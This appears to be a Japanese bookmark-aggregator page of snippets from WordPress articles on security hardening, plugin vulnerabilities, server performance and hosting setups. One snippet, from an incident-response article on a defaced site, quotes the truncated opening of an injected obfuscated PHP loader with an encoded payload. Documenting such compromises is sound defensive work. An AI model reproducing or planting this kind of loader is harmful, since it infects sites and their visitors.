WordPress セキュリティガイド #wpmeetupkyoto / WP Security Guidehttps://www.meetup.com/ja-JP/Kansai-WordPress-Meetup/events/281036210/
7年間使ってきたWordPressを捨ててContentful+Gatsby+Netlifyにしたら爆速になったし経緯とか教訓とか語る - Qiita
7年間使ってきたWordPressを捨ててContentful+Gatsby+Netlifyにしたら爆速になったし経緯とか教訓とか語るWordPressReactNetlifygatsbycontentful こんにちは、古都ことと言います。普段はブログやらなんやらをやっているのですが、今回ブログのお引っ越しをしたのでその経緯などについてお話ししたいと思います。 先にまとめ ブログをVPSとWordPressで7年間運営してきた 速度面やメンテナンス面でそろそろガタがきていた Contentful+Gastby+Netlifyの構成に移行した Lighthouseで高スコア叩き出せた 技術選択って難しいね 運営しているブログ Subterranean Flower Blogというブログをやってます。 主にフロントエンド周りのことを取り扱っており、たまにマリオ64の記事や、転職の記事などでも
簡単にできるWordPressのセキュリティ対策×12 | knowledge / baigie
ベイジでエンジニアをしている野村です。 ベイジには2012年の新年ともに入社し、WordPressやMovable TypeなどのCMSのカスタマイズなど、サーバーサイドの開発を中心に行っています。今後もそのあたりの情報を発信していきたいと思います。 今回は、WordPressについて。 WordPressはブログシステムというより、もはやCMSといっていいでしょう。インストールなどの設定も簡単、自由にカスタマイズできるプラグインやデザインテーマも豊富、何よりオープンソースで無償、ということで世界中で広く使われています。 このように数多くのメリットがあり、コストパフォーマンスが非常に高いWordPressですが、最近、セキュリティ上の問題を理由に、WordPressの使用を禁止している企業にしばしば出会います。 確かにWordPressは特別セキュアなCMSではありませんが、他の多くのCM
WordPressプラグインを狙う攻撃が活発化している件をまとめてみた - piyolog
「Yuzo Related Posts」など人気のWordPressプラグインを狙った攻撃活動が観測されているとしてセキュリティベンダが注意を呼び掛けており、また国内でも関連が疑われる被害報告が上がっています。ここでは関連する情報をまとめます。 3月以降脆弱性が確認されたプラグイン 2019年3月以降、脆弱性の悪用が報告されたプラグインは次のもの。 No 報告日 対象のプラグイン インストール数 バージョン 脆弱性 1 2019/03/15 Easy WP SMTP 40万件超 1.3.9以前 管理者への特権昇格 2 2019/03/21 Social Warfare 6万件超 3.5.2以前 XSS(格納型)、任意コードの実行 3 2019/03/30 Yuzo Related Posts 6万件超 5.12.91以前 XSS(格納型) 4 2019/04/09 Visual CSS S
〈2015年版〉AWSでWordPress用の冗長構成を構築する(ELB,EC2,S3,CloudFront,RDS) | WordPressPerson
WordPressのカスタマイズやテーマファイル、プラグインの作り方などデータベース構造から詳しく解説します。 はじめに AWSでWordPressの運用をするにあたって、アクセス数増加に備えた冗長構成を構築しました。 (構築した概要はこちら) とりあえずここまでやっておけば、あとは負荷に応じてインスタンスサイズを変更したり、サーバーを追加するだけなのでラクちんです。 構築を行ううえでハマったポイントと、参考にした記事をご紹介します。 ステップ1:EC2+RDSでWordPressをインストール まずはじめにEC2にApache、PHPをインストールしWebサーバーを作成します。 これはAmazonの公式リファレンスを参考にすれば比較的容易に作成出来ます。 <参考>AWS チュートリアル こちらではMySQLのインストールも解説されていますが、今回はWebサーバーとして利用するのでインスト
Nginx + lsyncd で WordPress を負荷分散させる - dogmap.jp
最近、め組ことデジタルキューブさんと、一緒に仕事をやらせてもらってます。 今の所は、主に WordPress サイトの高速化とかやってるんですけど、その中で WordPress サイトを複数台のサーバで負荷分散させて高速化させる案件があったので、その時の作業内容をシェア。 最近はさくらの VPS とか、低価格の VPS が出てきてるので、個人でも手を出せる領域かもしれませんね。 今回は2台のサーバを使って PHP の処理を負荷分散しました。 構成は、こんな感じです。 プライマリサーバ ( vps1.example.com : 192.168.0.1 ) Nginx, Load Balancer、PHP FastCGI のアプリケーションサーバ lsyncd (リアルタイム rsync を実現するためのサービス) セカンダリサーバ ( vps2.example.com : 192.168.0
ブログを始めて半年が経過した今、アクセス&アフィリエイト収益を振り返り - 無職透明な日々はナニイロに染まるか
「200記事を超えたらやろう」、「〇〇万PVを超えたらやろう」と何度も何度も思ってきたのですが、結局やってこなかったブログ単位での振り返り。ブログを書き始めてから半年が経ったこの時期に、ついに実行したいと思います。 ちなみに本ブログを書き始めたのは2014年の6月19日なので、半年ちょっと経過していることになります。現在の更新記事数は、本記事も含めて233記事。思えば、何のことはない日常をだらだらと書き綴ってきたものです。 そして最近、私のブログと同じような発展の仕方をされているブログを発見したので、そちらの記事に書かれていることをパクリ参考にしながら、私のブログの変化を追っていきたいと思います。 ちなみに本記事よりも詳細に、そして長期間の分析や考察、示唆をされているので、興味のある方はリンク先を参照してみて下さい。 それでは、本ブログの半年間の振り返りを行いたいと思います。 PVについて
脆弱性を突かれて Web サイトを改ざんされてウィルス呼び出しコードを埋めこまれたファイルの調べ方と除去と対応作業と申請手続きについて
改ざんされてウィルス配布コード埋めこまれてから復旧までの作業や申請の手続きについてまとめていきます。 追記: 「改ざんされた場合そのものの対処方法」という意味で書かせて頂きました。phpMyAdmin の脆弱性についてではなく全般的な内容となっております。誤解を与える表現となってしまい申し訳御座いません。 今回埋めこまれた不正なコード 実際のコードは改行やスペースがなくなって一行のコードとなっておりますので非常に気づきにくいです。 <?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) { $eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8h1Rn1XULdmbqxGU7h1Rn
Webデザイナーさんにおすすめの無料で読める電子書籍いろいろ
2014年2月25日 Web関連記事, インスピレーション 私は普段紙の本をほとんど読みません。年に1冊読むか読まないか…。しかし、iPadを購入してからはなぜか電子書籍なら読むようになりました。ディスプレイで読む事の方が慣れているからですかね…?という事で私が最近読んだ無料の電子書籍をいくつか紹介します。日本語のものは比較的サクサク読めるものばかりなので、空いた時間に読んでみてください! ↑私が10年以上利用している会計ソフト! インタラクティブPDFでつくったインタラクティブPDFのつくりかた〜動画/音声再生・ページ効果編〜 ダウンロード InDesignで動画や音声付きのPDFファイルの作り方を説明してます。サンプルもついています。紙の本では表現できない、電子書籍の魅力はこういった点にあると思うので、これから電子書籍の出版を考えている人には参考になると思います。 地域でメディアづくり
さくらVPSとnginxリバースプロクシで最速WordPressブログを作る方法(ベンチマーク付き)
負荷的に厳しくなってきたので sakuratan.biz を Apache(さくらスタンダード)から nginx(さくら VPS 512)に移転しました。 頻発していた 503 もほとんど出なくなって快適です。 Apache から VPS の nginx へ WordPress を移転したいと考えている人もいるかなーと思いましたので、さくら VPS で nginx リバースプロクシを使った WordPress ブログの構築する方法をがっつり書いていきたいと思います。 結構長文になってしまいましたので、先に索引を載せときます。 nginx とは nginx が速い理由 リバースプロクシ さくら VPS にインストールするシステム構成 EPEL パッケージリポジトリのインストール MySQL のインストール PHP のインストール nginx のインストール nginx と PHP FastC
WordPressをCentOS+Apache+mod_fastcgi+PHP-FPMを使って動かしてみた - As a Futurist...
このブログはさくら VPS で動かしているのですが、さくら VPS の一番弱いところはメモリの大きさが 512MB というところなんですよね。PHP みたいな LL は結構メモリは富豪的に使うので mod_php 使って httpd のメモリを膨れさせてると、同時接続数そんなに上げられないわけです。 アプリケーションサーバを WEB サーバと切り離すのであれば、定番としては WEB サーバとして Apache+mod_proxy や lighttpd や nginx を前段に置いて、 mod_php で起動した Apache にプロキシして上げるというのが一つのやり方です。 ただ、1 台のホストでやってるので Apache を 2 種類上げるとかなんか気持ち悪いし、 Apache 以外はあんまりよく分からない。 こんな時には、FastCGI を使って httpd から切り離すのが常套手段な
nginx + PHP-FPMでWordPressを動かしてみる | いわぶろ(ろてん)
はじめに もう1週間経ってしまっていますが,新年,明けましておめでとうございます. 3日ほど実家には帰ったものの,2010年と2011年との境目がない感じにテンパり続けているissmを,本年もどうぞよろしくお願い申し上げます.(あと,こちらの本もあわせてよろしくお願いしますw) ほぼ恒例になってきた年1回のぶろぐ気分転換を,本年もテキトーに行ってみました.コンセプトなどはありません.そのついでに,昨年は lighttpd で動作していたものを,今回は nginx で動作させてみました. 以下,本ぶろぐ,というか WordPress が nginx 上で動作するための設定の記録などをざっと紹介します. レシピ 次のような環境で試してみます. CentOS on さくらのVPS nginx 0.8.53 MySQL 5.1.50 PHP 5.3.4 WordPress 3.0.4 $USER=
WordPress と OAuth 認証を使って会員向け Web サービスを作る
WordPress で主に Twitter の OAuth を使ったり、データベースに会員情報を持っておく方法を紹介します。すべて説明していると返って分かりにくくなりますので、ポイントを押さえて説明していきますので読んでみてください。今回メインで参考にさせて頂いた記事は以下です。 PHPでTwitter APIのOAuthを使う方法まとめ – 頭ん中 WordPress のデータベースにメンバーテーブルを作成 id を WordPress 側で使い、user_id は Twitter の user_id です。user_name は Twitter での screen_name です。access_token_key と access_token_secret を保存しておけばサイト側からツイートなどを行うこともできます。 CREATE TABLE IF NOT EXISTS `wp_me
細部まで丁寧にデザインされたWordPressのテーマファイル30選
最近リリースされたものを中心とした、細部まで丁寧にデザインされたWordPressのテーマファイルの紹介です。
1
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
僕のWordPress×dockerのローカル開発環境の使い方を丁寧に紹介します
個人ブログを Next.js + Headless WordPressに 切り替えた話 / shifter-meetup-202011
TechCrunch
AWS+WordPress - AWSでスケーラブルなWordPressサイトを構築しよう